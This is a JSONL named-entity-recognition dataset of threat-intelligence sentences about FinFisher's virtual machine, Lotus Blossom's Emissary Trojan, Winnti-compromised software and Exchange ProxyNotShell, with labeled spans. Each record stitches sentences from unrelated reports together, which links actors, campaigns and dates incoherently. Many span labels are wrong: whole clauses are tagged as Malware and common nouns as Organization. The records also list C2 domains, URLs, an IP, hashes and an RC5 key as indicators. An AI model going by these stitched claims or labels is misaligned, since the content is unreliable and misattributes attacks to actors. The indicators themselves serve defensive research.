{"text": "Generic Windows Defender ATP detections trigger alerts on FinFisher behavior While our analysis has allowed us to immediately protect our customers , we \u2019 d like to share our insights and add to the growing number of published analyses by other talented researchers ( listed below this blog post ) . The well-known threat group called DRAGONFISH or Lotus Blossom are distributing a new form of Elise malware targeting organizations for espionage purposes . Perhaps the attackers are trying to reduce the load from their C&C servers by avoiding callbacks from uninteresting victims . The domain name was created on the same day the ad appeared and the website is a copy of the real one .", "spans": [{"start": 8, "end": 28, "label": "System"}, {"start": 58, "end": 67, "label": "Malware"}, {"start": 315, "end": 327, "label": "Organization"}, {"start": 335, "end": 345, "label": "Organization"}, {"start": 349, "end": 362, "label": "Organization"}, {"start": 394, "end": 407, "label": "System"}, {"start": 436, "end": 445, "label": "Organization"}, {"start": 583, "end": 686, "label": "Malware"}]}
{"text": "We hope that this blog post helps other researchers to understand and analyze FinFisher samples and that this industry-wide information-sharing translate to the protection of as many customers as possible . The threat actors associated with DRAGONFISH have previously focused their campaigns on targets in Southeast Asia , specifically those located in countries near the South China Sea . Based on ESET telemetry , one of the second stage payload delivered to victims is Win64/Winnti.BN . Its capabilities include retrieving and executing additional payloads , collecting basic system information , and executing shell commands .", "spans": [{"start": 78, "end": 87, "label": "Malware"}, {"start": 211, "end": 224, "label": "Organization"}, {"start": 241, "end": 251, "label": "Organization"}, {"start": 399, "end": 403, "label": "Organization"}, {"start": 472, "end": 487, "label": "Indicator"}]}
{"text": "Spaghetti and junk codes make common analyst tools ineffective In analyzing FinFisher , the first obfuscation problem that requires a solution is the removal of junk instructions and \u201c spaghetti code \u201d , which is a technique that aims to confuse disassembly programs . iDefense analysts have identified a campaign likely to be targeting members of\u2014 or those with affiliation or interest in\u2014the ASEAN Defence Ministers ' Meeting ( ADMM ) . As far as we can tell , its dropper was downloaded over HTTPS from api.goallbandungtravel.com . The downloader uses managed AES ( Rijndael algorithm ) to decrypt the appended data which is then reflectively loaded as a byte array using the Assembly .", "spans": [{"start": 76, "end": 85, "label": "Malware"}, {"start": 269, "end": 277, "label": "Organization"}, {"start": 400, "end": 427, "label": "Organization"}, {"start": 430, "end": 434, "label": "Organization"}, {"start": 506, "end": 532, "label": "Indicator"}, {"start": 535, "end": 549, "label": "Malware"}, {"start": 550, "end": 687, "label": "Malware"}]}
{"text": "Spaghetti code makes the program flow hard to read by adding continuous code jumps , hence the name . iDefense analysts have identified a campaign likely to be targeting members of or those with affiliation or interest in the ASEAN Defence Minister 's Meeting ( ADMM ) . We have seen it installed as a Windows service and as a DLL in C:\\Windows\\System32 using the following file names : The threat actor was consistently observed removing prior payloads from disk ; however , the FSEvents artifacts were able to provide great insight into files that previously existed on disk .", "spans": [{"start": 102, "end": 110, "label": "Organization"}, {"start": 226, "end": 259, "label": "Organization"}, {"start": 262, "end": 266, "label": "Organization"}, {"start": 302, "end": 309, "label": "System"}, {"start": 327, "end": 330, "label": "System"}, {"start": 480, "end": 498, "label": "System"}]}
{"text": "An example of FinFisher \u2019 s spaghetti code is shown below . iDefense assesses with high confidence that this campaign is associated with the threat group DRAGONFISH ( also known as Lotus Blossom and Spring Dragon ) . cscsrv.dll dwmsvc.dll iassrv.dll mprsvc.dll nlasrv.dll powfsvc.dll racsvc.dll slcsvc.dll snmpsvc.dll sspisvc.dll . Indicators of compromise act as breadcrumbs that lead infosec and IT pros to detect malicious activity early in the attack sequence .", "spans": [{"start": 14, "end": 23, "label": "Malware"}, {"start": 60, "end": 68, "label": "Organization"}, {"start": 141, "end": 153, "label": "Organization"}, {"start": 154, "end": 164, "label": "Organization"}, {"start": 181, "end": 194, "label": "Organization"}, {"start": 199, "end": 212, "label": "Organization"}, {"start": 217, "end": 227, "label": "Indicator"}, {"start": 228, "end": 238, "label": "Indicator"}, {"start": 239, "end": 249, "label": "Indicator"}, {"start": 250, "end": 260, "label": "Indicator"}, {"start": 261, "end": 271, "label": "Indicator"}, {"start": 272, "end": 283, "label": "Indicator"}, {"start": 284, "end": 294, "label": "Indicator"}, {"start": 295, "end": 305, "label": "Indicator"}, {"start": 306, "end": 317, "label": "Indicator"}, {"start": 318, "end": 329, "label": "Indicator"}, {"start": 332, "end": 356, "label": "Indicator"}]}
{"text": "Figure 2 . To mitigate the threat of the described campaign , security teams can consider blocking access to the C2 server 103.236.150.14 and , where applicable , ensure that the Microsoft Security Update KB2553204 is installed in order to patch the CVE-2017-11882 vulnerability . The samples we have analyzed were actually quite large , each of them about 60 MB . In terms of detection , organizations should look to align their detection strategy with the MITRE ATTCK Framework to help detect a ransomware attack before its too late .", "spans": [{"start": 250, "end": 264, "label": "Vulnerability"}]}
{"text": "The spaghetti code in FinFisher dropper This problem is not novel , and in common situations there are known reversing plugins that may help for this task . The actors attempted to exploit CVE-2014-6332 using a slightly modified version of the proof-of-concept ( POC ) code to install a Trojan called Emissary , which is related to the Operation Lotus Blossom campaign . This is , however , only for appearance because the real size or the PE file is between 63 KB and 72 KB , depending on the version . That makes highfidelity threat intelligence and a proactive security stance critically important to success in 2023 .", "spans": [{"start": 22, "end": 31, "label": "Malware"}, {"start": 161, "end": 167, "label": "Organization"}, {"start": 189, "end": 202, "label": "Vulnerability"}, {"start": 301, "end": 309, "label": "System"}]}
{"text": "In the case of FinFisher , however , we could not find a good existing interactive disassembler ( IDA ) plugin that can normalize the code flow . The targeting of this individual suggests the actors are interested in breaching the French Ministry of Foreign Affairs itself or gaining insights into relations between France and Taiwan . The malware files simply have lots of clean files appended to them . To understand the context of a computing interaction between servers , tools , and users , we need to analyze the endtoend process .", "spans": [{"start": 15, "end": 24, "label": "Malware"}, {"start": 168, "end": 178, "label": "Organization"}, {"start": 192, "end": 198, "label": "Organization"}, {"start": 466, "end": 473, "label": "System"}, {"start": 476, "end": 481, "label": "System"}, {"start": 488, "end": 493, "label": "Organization"}]}
{"text": "So we decided to write our own plugin code using IDA Python . On November 10 , 2015 , threat actors sent a spear-phishing email to an individual at the French Ministry of Foreign Affairs . This is probably done by the component that drops and installs this malicious service . The Monti ransomware collective has restarted their operations , focusing on institutions in the legal and governmental fields .", "spans": [{"start": 53, "end": 59, "label": "System"}, {"start": 86, "end": 99, "label": "Organization"}, {"start": 134, "end": 144, "label": "Organization"}, {"start": 281, "end": 308, "label": "Organization"}, {"start": 374, "end": 403, "label": "Organization"}]}
{"text": "Armed with this code , we removed this first layer of anti-analysis protection . On November 10 , 2015 , Lotus Blossom sent a spear-phishing email to an individual at the French Ministry of Foreign Affairs . Once the service runs , it appends the extension .mui to its DLL path , reads that file and decrypts it using RC5 . In one particular forum post , Hack520 mentions that he was previously jailed for a period of 10 months in a blog post dated May 31 , 2009 .", "spans": [{"start": 105, "end": 118, "label": "Organization"}, {"start": 153, "end": 163, "label": "Organization"}, {"start": 269, "end": 272, "label": "System"}, {"start": 318, "end": 321, "label": "System"}, {"start": 355, "end": 362, "label": "Organization"}]}
{"text": "Removing the junk instructions revealed a readable block of code . Both attachments are malicious Word documents that attempt to exploit the Windows OLE Automation Array Remote Code Execution Vulnerability tracked by CVE-2014-6332 . The decrypted MUI file contains position-independent code at offset 0 . This type of vulnerability is known as a server - side request forgery ( SSRF ) .", "spans": [{"start": 88, "end": 112, "label": "Malware"}, {"start": 141, "end": 205, "label": "Vulnerability"}, {"start": 217, "end": 230, "label": "Vulnerability"}, {"start": 346, "end": 384, "label": "Vulnerability"}]}
{"text": "This code starts by allocating two chunks of memory : a global 1 MB buffer and one 64 KB buffer per thread . Lotus Blossom attempted to exploit CVE-2014-6332 using the POC code available in the wild . The RC5 key is derived from the hard drive serial number and the string \u201c f@Ukd!rCto R$. \u201d \u2014 we were not able to obtain any MUI files nor the code that installs them in the first place . Malwarebytes customers are shielded against this campaign via our web protection in Endpoint Protection ( EP ) , Endpoint Detection and Response ( EDR ) and Malwarebytes Premium .", "spans": [{"start": 109, "end": 122, "label": "Organization"}, {"start": 144, "end": 157, "label": "Vulnerability"}, {"start": 205, "end": 208, "label": "System"}, {"start": 388, "end": 400, "label": "Organization"}, {"start": 437, "end": 445, "label": "Organization"}]}
{"text": "The big first buffer is used as index for multiple concurrent threads . This Trojan is related to the Elise backdoor described in the Operation Lotus Blossom report . Thus , we do not know the exact purpose of this malicious service . The log messages recorded in the nslog can include connection statistics for SSLVPN and ICA proxy sessions .", "spans": [{"start": 102, "end": 116, "label": "System"}, {"start": 312, "end": 318, "label": "System"}, {"start": 323, "end": 332, "label": "System"}]}
{"text": "A big chunk of data is extracted from the portable executable ( PE ) file itself and decrypted two times using a custom XOR algorithm . Lotus Blossom was attempting to exploit CVE-2014-6332 to install a new version of the Emissary Trojan , specifically version 5.3 . Recent versions of the malware include an \u201c auto-update \u201d mechanism , using C&C server http://checkin.travelsanignacio.com . CrowdStrike Services recently investigated several Play ransomware intrusions where the common entry vector was suspected to be the Microsoft Exchange ProxyNotShell vulnerabilities CVE-2022 - 41040 and CVE-2022 - 41082 .", "spans": [{"start": 136, "end": 149, "label": "Organization"}, {"start": 176, "end": 189, "label": "Vulnerability"}, {"start": 222, "end": 237, "label": "System"}, {"start": 354, "end": 389, "label": "Indicator"}, {"start": 392, "end": 412, "label": "Organization"}, {"start": 443, "end": 469, "label": "Organization"}, {"start": 524, "end": 556, "label": "Vulnerability"}, {"start": 573, "end": 589, "label": "Vulnerability"}, {"start": 594, "end": 610, "label": "Vulnerability"}]}
{"text": "We determined that this chunk of data contains an array of opcode instructions ready to be interpreted by a custom virtual machine program ( from this point on referenced generically as \u201c VM \u201d ) implemented by FinFisher authors . APT threat actors , most likely nation state-sponsored , targeted a diplomat in the French Ministry of Foreign Affairs with a seemingly legitimate invitation to a technology conference in Taiwan . That C&C server served the latest version of the MUI files encrypted with a static RC5 key . A recent report from the United Kingdom \u2019s National CyberSecurity Center ( NCSC ) highlights how the accessibility of these tools \u201c lowers the barrier to entry to state and non - state actors in obtaining capability and intelligence . \u201d", "spans": [{"start": 210, "end": 219, "label": "Malware"}, {"start": 230, "end": 247, "label": "Organization"}, {"start": 298, "end": 306, "label": "Organization"}, {"start": 510, "end": 513, "label": "System"}, {"start": 545, "end": 601, "label": "Organization"}]}
{"text": "Figure 3 . Additionally , the targeting of a French diplomat based in Taipei , Taiwan aligns with previous targeting by these actors , as does the separate infrastructure . The C&C server was not responding during our analysis . A typical web request to the frontend to exploit the SSRF vulnerability on CVE-2022 - 41040 involves some variation of path confusion that references the endpoint as shown below : The backend request for a typical ProxyNotShell exploitation is shown below : Once the PowerShell remoting service can be reached , the second step involves vulnerability CVE-2022 - 41082 being exploited in order to execute arbitrary commands .", "spans": [{"start": 45, "end": 60, "label": "Organization"}, {"start": 126, "end": 132, "label": "Organization"}, {"start": 282, "end": 300, "label": "Vulnerability"}, {"start": 304, "end": 320, "label": "Vulnerability"}, {"start": 443, "end": 456, "label": "Vulnerability"}, {"start": 496, "end": 523, "label": "Vulnerability"}, {"start": 580, "end": 596, "label": "Vulnerability"}]}
{"text": "The stages of the FinFisher multi-layered protection mechanisms Stage 0 : Dropper with custom virtual machine The main dropper implements the VM dispatcher loop and can use 32 different opcodes handlers . The Elise malware used by Lotus Blossom , which was an attack campaign on targets in Southeast Asia . Let\u2019s start with who is not targeted . Because the cdhash is computed based on executable code in the application , Mandiant was able to identify additional malware in the environment despite the files being deleted by the threat actor and the samples having different file hashes .", "spans": [{"start": 18, "end": 27, "label": "Malware"}, {"start": 209, "end": 222, "label": "System"}, {"start": 231, "end": 244, "label": "Organization"}, {"start": 354, "end": 420, "label": "Malware"}, {"start": 423, "end": 431, "label": "Organization"}]}
{"text": "Th 64KB buffer is used as a VM descriptor data structure to store data and the just-in-time ( JIT ) generated code to run . Based on the targeting and lures , Unit 42 assesses that the Lotus Blossom actors ' collection requirements include militaries and government agencies in Southeast Asia . Early in the payload , the malware checks to see if the system language is Russian or Chinese . e.g. , uses character as a separator and that contains valid IP list uses as a separator .", "spans": [{"start": 159, "end": 166, "label": "Organization"}, {"start": 185, "end": 205, "label": "Organization"}, {"start": 240, "end": 250, "label": "Organization"}, {"start": 255, "end": 274, "label": "Organization"}, {"start": 398, "end": 479, "label": "Malware"}]}
{"text": "The VM dispatcher loop routine ends with a JMP to another routine . In December 2015 , Unit 42 published a blog about a cyber espionage attack using the Emissary Trojan as a payload . In either case , the malware stops running . Among the group \u2019s most interesting characteristics are : \u2022 Strong functional and structural similarities linking its malware toolset to early MiniDuke and more recent CosmicDuke and OnionDuke components In early 2013 , GReAT observed several incidents that were so unusual they suggested the existence of a new , previously unknown threat actor .", "spans": [{"start": 87, "end": 94, "label": "Organization"}, {"start": 153, "end": 168, "label": "System"}, {"start": 372, "end": 380, "label": "Malware"}, {"start": 397, "end": 407, "label": "Malware"}, {"start": 412, "end": 421, "label": "Malware"}, {"start": 449, "end": 454, "label": "Organization"}]}
{"text": "In total , there are 32 different routines , each of them implementing a different opcode and some basic functionality that the malware program may execute . The oldest sample we found was created in 2009 , indicating this tool has been in use for almost seven years . There is no way around this : the attackers are simply not interested in computers configured with those languages . The malware uses stack strings followed by a single bitwise operation .", "spans": [{"start": 386, "end": 397, "label": "Malware"}, {"start": 398, "end": 455, "label": "Malware"}]}
{"text": "Figure 4 . In addition , Emissary appears to against Taiwan or Hong Kong , all of the decoys are written in Traditional Chinese , and they use themes related to the government or military . ESET telemetry shows victims are mostly located in Asia , with Thailand having the largest part of the pie . Depending on the platform and on how the code is compiled , these vulnerabilities could lead to arbitrary code execution : Talos is disclosing these vulnerabilities despite no official fix from Open Babel .", "spans": [{"start": 25, "end": 33, "label": "System"}, {"start": 165, "end": 175, "label": "Organization"}, {"start": 179, "end": 187, "label": "Organization"}, {"start": 190, "end": 194, "label": "Organization"}, {"start": 422, "end": 427, "label": "Organization"}, {"start": 493, "end": 503, "label": "Organization"}]}
{"text": "A snapshot of the code that processes each VM opcode and the associate interpreter The presence of a VM and virtualized instruction blocks can be described in simpler terms : Essentially , the creators of FinFisher interposed a layer of dynamic code translation ( the virtual machine ) that makes analysis using regular tools practically impossible . Of note , this is three years earlier than the oldest Elise sample we have found , suggesting this group has been active longer than previously documented . Given the popularity of the compromised application that is still being distributed by its developer , it wouldn\u2019t be surprising if the number of victims is in the tens or hundreds of thousands . There are also many examples of nation - state actors leveraging contractors to develop offensive capabilities , as shown most recently in contracts between Russia \u2019s Ministry of Defense and NTC Vulkan .", "spans": [{"start": 2, "end": 10, "label": "Malware"}, {"start": 205, "end": 214, "label": "Malware"}, {"start": 405, "end": 417, "label": "System"}, {"start": 450, "end": 455, "label": "Organization"}, {"start": 736, "end": 757, "label": "Organization"}, {"start": 861, "end": 890, "label": "Organization"}, {"start": 895, "end": 905, "label": "Organization"}]}
{"text": "Static analysis tools like IDA may not be useful in analyzing custom code that is interpreted and executed through a VM and a new set of instructions . In addition , we observed a TTP shift post publication with regards to their malware delivery ; they started using compromised but legitimate domains to serve their malware . Supply-chain attacks are hard to detect from the consumer perspective . Several issues in Foxit PDF reader could lead to arbitrary code execution Foxit PDF Reader is one of the most popular PDF readers on the market , offering many similar features to Adobe Acrobat .", "spans": [{"start": 283, "end": 301, "label": "System"}, {"start": 417, "end": 433, "label": "System"}, {"start": 473, "end": 489, "label": "System"}, {"start": 579, "end": 592, "label": "System"}]}
{"text": "On the other hand , dynamic analysis tools ( like debuggers or sandbox ) face the anti-debug and anti-analysis tricks hidden in the virtualized code itself that detects sandbox environments and alters the behavior of the malware . All of the Emissary we've collected are written in Traditional Chinese , which is used primarily in Taiwan and Hong Kong . It is impossible to start analyzing every piece of software we run , especially with all the regular updates we are encouraged or required to install . TIEDYE can communicate with a C2 server using a range of supported protocols described as follows .", "spans": [{"start": 242, "end": 250, "label": "System"}, {"start": 536, "end": 545, "label": "System"}]}
{"text": "At this stage , the analysis can only continue by manually investigating the individual code blocks and opcode handlers , which are highly obfuscated ( also using spaghetti code ) . One of the most interesting observations made during this analysis is that the amount of development effort devoted to Emissary significantly increased after we published our Operation Lotus Blossom report in June 2015 , resulting in many new versions of the Emissary Trojan . So , we put our trust in software vendors that the files they distribute don\u2019t include malware . CrowdStrike researchers replicated the exploit method attack on Exchange systems that had not received the November 8 , 2022 patch KB5019758 , but could not replicate the attack on systems that had received that patch .", "spans": [{"start": 301, "end": 309, "label": "System"}, {"start": 441, "end": 456, "label": "System"}, {"start": 556, "end": 579, "label": "Organization"}, {"start": 620, "end": 636, "label": "Organization"}]}
{"text": "Reusing our deobfuscation tool and some other tricks , we have been able to reverse and analyze these opcodes and map them to a finite list that can be used later to automate the analysis process with some scripting . Lotus Blossom targeted the government , higher education , and high tech companies . Perhaps that\u2019s the reason multiple groups target software developers : compromising the vendor results in a botnet as popular as the software that is hacked . But on Mar. 5 , 2014 , Harrison committed suicide by shooting himself in the head with a handgun .", "spans": [{"start": 218, "end": 231, "label": "Organization"}, {"start": 245, "end": 255, "label": "Organization"}, {"start": 258, "end": 274, "label": "Organization"}, {"start": 281, "end": 300, "label": "Organization"}, {"start": 485, "end": 493, "label": "Organization"}]}
{"text": "The opcode instructions generated by this custom VM are divided into different categories : Logical opcodes , which implement bit-logic operators ( OR , AND , NOT , XOR ) and mathematical operators Conditional branching opcodes , which implement a code branch based on conditions ( equals to JC , JE , JZ , other similar branching opcodes ) Load/Store opcodes , which write to or read from particular addresses of the virtual address space of the process Specialized opcodes for various purposes , Our evidence suggests that malware authors created Emissary as early as 2009 , which suggests that threat actors have relied on this tool as a payload in cyber-espionage attacks for many years . However , there is a downside of using such a technique : once the scheme is uncovered , the attacker loses control and computers can be cleaned through regular updates . What \u2019s more , two other vulnerabilities in MOVEit were found while new victims were still coming forward .", "spans": [{"start": 549, "end": 557, "label": "System"}, {"start": 597, "end": 610, "label": "Organization"}, {"start": 908, "end": 914, "label": "System"}]}
{"text": "like execute specialized machine instruction that are not virtualized We are publishing below the ( hopefully ) complete list of opcodes used by FinFisher VM that we found during our analysis and integrated into our de-virtualization script : INDEX MNEMONIC DESCRIPTION 0x0 EXEC Execute machine code 0x1 JG Jump if greater/Jump if not less or equal 0x2 WRITE Write a value into the dereferenced internal VM value ( treated as a pointer ) 0x3 JNO Jump if not overflow 0x4 JLE Jump While it lacks more advanced functionality like screen capturing , it is still able to carry out most tasks desired by threat actors : exfiltration of files , ability to download and execute additional payloads , and gain remote shell access . We do not know the motives of the attackers at this point . 3AM is written in Rust and appears to be a completely new malware family .", "spans": [{"start": 145, "end": 154, "label": "Malware"}, {"start": 599, "end": 612, "label": "Organization"}, {"start": 615, "end": 636, "label": "Malware"}, {"start": 650, "end": 658, "label": "Malware"}, {"start": 663, "end": 690, "label": "Malware"}, {"start": 697, "end": 721, "label": "Malware"}, {"start": 784, "end": 787, "label": "Malware"}, {"start": 802, "end": 806, "label": "System"}]}
{"text": "if less or equal ( signed ) 0x5 MOV Move the value of a register into the VM descriptor ( same as opcode 0x1F ) 0x6 JO Jump if overflow 0x7 PUSH Push the internal VM value to the stack 0x8 ZERO Reset the internal VM value to 0 ( zero ) 0x9 JP Jump if parity even 0xA WRITE Write into an address 0xB ADD Add the value of a register to the internal VM value 0xC JNS Jump if not signed 0xD JL Jump if less ( signed ) 0xE The timeline in Figure 2 shows that the Emissary Trojan was first created ( version 1.0 ) in May 2009 and quickly received an update that resulted in version 1.1 in June 2009 . Is it simply financial gain? Are there any reasons why the three affected products are from Asian developers and for the Asian market? Do these attackers use a botnet as part of a larger espionage operation? ESET products detect this threat as Win32/HackedApp.Winnti.A , Win32/HackedApp.Winnti.B , the payload as Win32/Winnti.AG , and the second stage as Win64/Winnti.BN . The United States government also threatened to step in when it looked like a U.S. company was going to purchase NSO Group , an infamous Israeli maker of the Pegasus spyware .", "spans": [{"start": 458, "end": 473, "label": "System"}, {"start": 803, "end": 807, "label": "Organization"}, {"start": 839, "end": 863, "label": "Indicator"}, {"start": 866, "end": 890, "label": "Indicator"}, {"start": 908, "end": 923, "label": "Indicator"}, {"start": 950, "end": 965, "label": "Indicator"}, {"start": 968, "end": 996, "label": "Organization"}, {"start": 1044, "end": 1058, "label": "Organization"}, {"start": 1081, "end": 1090, "label": "Organization"}, {"start": 1122, "end": 1141, "label": "Malware"}]}
{"text": "EXEC Execute machine code and branch 0xF JBE Jump if below or equal or Jump if not above 0x10 SHL Shift left the internal value the number of times specified into the opcodes 0x11 JA Jump if above/Jump if not below or equal 0x12 MOV Move the internal VM value into a register 0x13 JZ JMP if zero 0x14 ADD Add an immediate value to the internal Vm descriptor 0x15 JB Jump if below ( unsigned ) 0x16 JS Jump if signed 0x17 EXEC Execute Between August and November 2015 the malware author creates several new versions of Emissary , specifically 5.0 , 5.1 , 5.3 and 5.4 in a much more rapid succession compared to development process in earlier versions . Compromised file samples ( Win32/HackedApp.Winnti.A and B ) mac-555549440ea0d64e96bb34428e08cc8d948b40e7", "spans": [{"start": 518, "end": 526, "label": "System"}, {"start": 679, "end": 709, "label": "Indicator"}, {"start": 712, "end": 756, "label": "Malware"}]}
{"text": "machine code ( same as opcode 0x0 ) 0x18 JGE Jump if greater or equal/Jump if not less 0x19 DEREF Write a register value into a dereferenced pointer 0x1A JMP Special obfuscated \u201c Jump if below \u201d opcode 0x1B * Resolve a pointer 0x1C LOAD Load a value into the internal VM descriptor 0x1D JNE Jump if not equal/Jump if not zero 0x1E CALL Call an external function or a function located in the dropper 0x1F MOV Version 2.0 received one update in October 2013 before the malware author released version 3.0 in December 2014 . Winnti : 7cf41b1acfb05064518a2ad9e4c16fde9185cd4b Tue Nov 13 10:12:58 2018 1729131071 8272c1f4 . Simultaneously , a new variant of Monti , based on the Linux platform , has surfaced , demonstrating notable differences from its previous Linux - based versions .", "spans": [{"start": 522, "end": 528, "label": "Organization"}, {"start": 531, "end": 571, "label": "Indicator"}, {"start": 653, "end": 658, "label": "Organization"}, {"start": 674, "end": 688, "label": "System"}]}
{"text": "Move the value of a register into the VM descriptor 0x20 JNB Jump if not below/Jump if above or equal/Jump if not carry 0x21 JNP Jump if not parity/Jump if parity odd Each virtual instruction is stored in a special data structure that contains all the information needed to be properly read and executed by the VM . While this may be coincidental , the out-of-sequence version 3.0 sample was created ten days after we published the Operation Lotus Blossom paper that exposed the Elise Trojan that is closely related to Emissary . Winnti : 7f73def251fcc34cbd6f5ac61822913479124a2a Wed Nov 14 03:50:18 2018 19317120 44260a1d . Harrison signed his threatening missive with the salutation , \u201c We are legion , \u201d suggesting that whatever comeuppance he had in store for Ashley Madison would come from a variety of directions and anonymous hackers .", "spans": [{"start": 479, "end": 491, "label": "System"}, {"start": 519, "end": 527, "label": "System"}, {"start": 530, "end": 536, "label": "Organization"}, {"start": 539, "end": 579, "label": "Indicator"}, {"start": 625, "end": 633, "label": "Organization"}, {"start": 764, "end": 778, "label": "Organization"}]}
{"text": "This data structure is 24 bytes and is composed of some fixed fields and a variable portion that depends on the opcode . The Lotus Blossom largely targets military or government , with some cases of higher education and high tech companies . Winnti : dac0bd8972f23c9b5f7f8f06c5d629eac7926269 Tue Nov 27 03:05:16 2018 1729131071 8272c1f4 . According to Kaspersky telemetry , targeted organizations included think tanks and individuals working in various areas related to security and geopolitics .", "spans": [{"start": 125, "end": 138, "label": "Organization"}, {"start": 155, "end": 163, "label": "Organization"}, {"start": 167, "end": 177, "label": "Organization"}, {"start": 199, "end": 215, "label": "Organization"}, {"start": 220, "end": 239, "label": "Organization"}, {"start": 242, "end": 248, "label": "Organization"}, {"start": 251, "end": 291, "label": "Indicator"}, {"start": 352, "end": 361, "label": "Organization"}, {"start": 406, "end": 417, "label": "Organization"}, {"start": 422, "end": 494, "label": "Organization"}]}
{"text": "Before interpreting the opcode , the VM decrypts the opcode \u2019 s content ( through a simple XOR algorithm ) , which it then relocates ( if needed ) , using the relocation fields . The use of Emissary appears to be focused only on Taiwan and Hong Kong , with regular malware updates to avoid detection and to increase the odds of success . Some hashes were redacted per request from one of the vendor . A cybercriminal may be impersonating a legitimate external user by using a Man in the Middle MiTM attack ,", "spans": [{"start": 190, "end": 198, "label": "System"}, {"start": 403, "end": 416, "label": "Organization"}]}
{"text": "Here is an approximate diagram of the opcode data structure : Figure 5 . The Lotus Blossom actors using Emissary have been active for at least seven years in Southeast Asia . If for a particular reason you need them , reach out to us at threatintel@eset.com . Also , ideology as a motivator could mean your group is the target of nation states .", "spans": [{"start": 77, "end": 97, "label": "Organization"}, {"start": 104, "end": 112, "label": "System"}, {"start": 307, "end": 312, "label": "Organization"}, {"start": 330, "end": 343, "label": "Organization"}]}
{"text": "A graphical representation of the data structure used to store each VM opcode The VM handler is completely able to generate different code blocks and deal with relocated code due to address space layout randomization ( ASLR ) . Magic Hound has primarily targeted organizations in the energy , government , and technology sectors that are either based or have business interests in Saudi Arabia . Payload Samples ( Win32/Winnti.AG ) Surprisingly enough , it does not take very long to get some information about Hack520 : someone with this handle runs a blog and a Twitter account ( with a handle close to Hack520 ) that is also directly linked to the blog .", "spans": [{"start": 284, "end": 290, "label": "Organization"}, {"start": 293, "end": 303, "label": "Organization"}, {"start": 310, "end": 328, "label": "Organization"}, {"start": 414, "end": 429, "label": "Indicator"}, {"start": 511, "end": 518, "label": "Organization"}, {"start": 564, "end": 571, "label": "System"}, {"start": 605, "end": 612, "label": "Organization"}]}
{"text": "It is also able to move code execution into different locations if needed . Regardless of causation , the rapid development of new versions of Emissary suggests that the malware authors are making frequent modifications to evade detection , which as a corollary suggests the Lotus Blossom are actively using the Emissary Trojan as a payload in attacks . Winnti : a045939f53c5ad2c0f7368b082aa7b0bd7b116da https://bugcheck.xigncodeservice.com/Common/Lib/Common_bsod.php . Since early 2023 , we have seen several new Yashma strains emerge , including ANXZ , Sirattacker , and Shadow Men Team .", "spans": [{"start": 143, "end": 151, "label": "System"}, {"start": 275, "end": 288, "label": "Organization"}, {"start": 312, "end": 327, "label": "System"}, {"start": 354, "end": 360, "label": "Organization"}, {"start": 363, "end": 403, "label": "Indicator"}, {"start": 404, "end": 467, "label": "Indicator"}, {"start": 548, "end": 552, "label": "Organization"}, {"start": 555, "end": 566, "label": "Organization"}, {"start": 573, "end": 588, "label": "Organization"}]}
{"text": "For instance , in the case of the \u201c Execute \u201d opcode ( 0x17 ) , the 32-bit code to run is stored entirely into the variable section with the value at offset 5 specifying the number of bytes to be copied and executed . Link analysis of infrastructure and tools also revealed a potential relationship between Magic Hound and the adversary group called \" Rocket Kitten \" ( AKA Operation Saffron Rose , Ajax Security Team , Operation Woolen-Goldfish ) as well as an older attack campaign called Newscasters . Winnti : a260dcf193e747cee49ae83568eea6c04bf93cb3 https://bugcheck.xigncodeservice.com/Common/Lib/Common_Include.php . DDoS and MiTM Attacks Any anomalous increase in traffic or redirect through unrecognized external servers can be an indication of a cyberattack that s about to happen .", "spans": [{"start": 337, "end": 342, "label": "Organization"}, {"start": 352, "end": 365, "label": "Organization"}, {"start": 374, "end": 396, "label": "Organization"}, {"start": 399, "end": 417, "label": "Organization"}, {"start": 420, "end": 445, "label": "Organization"}, {"start": 505, "end": 511, "label": "Organization"}, {"start": 514, "end": 554, "label": "Indicator"}, {"start": 555, "end": 621, "label": "Indicator"}, {"start": 646, "end": 729, "label": "Indicator"}]}
{"text": "Otherwise , in the case of conditional opcodes , the variable part can contain the next JIT packet ID or the next relative virtual address ( RVA ) where code execution should continue . In addition to the malware evolution , the actors also shifted from solely spear-phishing targets with attachments to also compromising legitimate websites to host malware . Winnti : dde82093decde6371eb852a5e9a1aa4acf3b56ba https://bugcheck.xigncodeservice.com/Common/Lib/common.php . LockBit reportedly squeezed about $ 91 million out of US organizations with around 1,700 attacks since 2020 , according to a June report by CISA .", "spans": [{"start": 229, "end": 235, "label": "Organization"}, {"start": 360, "end": 366, "label": "Organization"}, {"start": 369, "end": 409, "label": "Indicator"}, {"start": 410, "end": 468, "label": "Indicator"}, {"start": 471, "end": 478, "label": "Organization"}, {"start": 525, "end": 541, "label": "Organization"}, {"start": 611, "end": 615, "label": "Organization"}]}
{"text": "Of course , not all the opcodes are can be easily read and understood due to additional steps that the authors have taken to make analysis extremely complicated . It is highly likely the Lotus Blossom used spear-phishing attacks containing links to these malicious documents as a delivery mechanism . Winnti : 8272c1f41f7c223316c0d78bd3bd5744e25c2e9f https://nw.infestexe.com/version/last.php . By understanding the TTPs of the leaked source codes , defenders will gain invaluable insights that are helpful in identifying and mitigating any existing security weakness in their environment and improving their security defense against these attack vectors .", "spans": [{"start": 187, "end": 200, "label": "Organization"}, {"start": 301, "end": 307, "label": "Organization"}, {"start": 310, "end": 350, "label": "Indicator"}, {"start": 351, "end": 392, "label": "Indicator"}]}
{"text": "For example , this is how opcode 0x1A is implemented : The opcode should represent a JB ( Jump if below ) function , but it \u2019 s implemented through set carry ( STC ) instruction followed by a JMP into the dispatcher code that will verify the carry flag condition set by STC . We were ultimately able to identify multiple organizations in the government , energy , and technology sectors targeted by Magic Hound . Winnti : 44260a1dfd92922a621124640015160e621f32d5 https://dump.gxxservice.com/common/up/up_base.php . Another wave of suspected Dukes attacks was identified in November 2018 by FireEye , this time again relying on Windows LNK files and deploying Cobalt Strike .", "spans": [{"start": 342, "end": 352, "label": "Organization"}, {"start": 355, "end": 361, "label": "Organization"}, {"start": 368, "end": 386, "label": "Organization"}, {"start": 413, "end": 419, "label": "Organization"}, {"start": 422, "end": 462, "label": "Indicator"}, {"start": 463, "end": 512, "label": "Indicator"}, {"start": 541, "end": 554, "label": "Organization"}, {"start": 590, "end": 597, "label": "Organization"}, {"start": 627, "end": 644, "label": "Indicator"}, {"start": 659, "end": 672, "label": "System"}]}
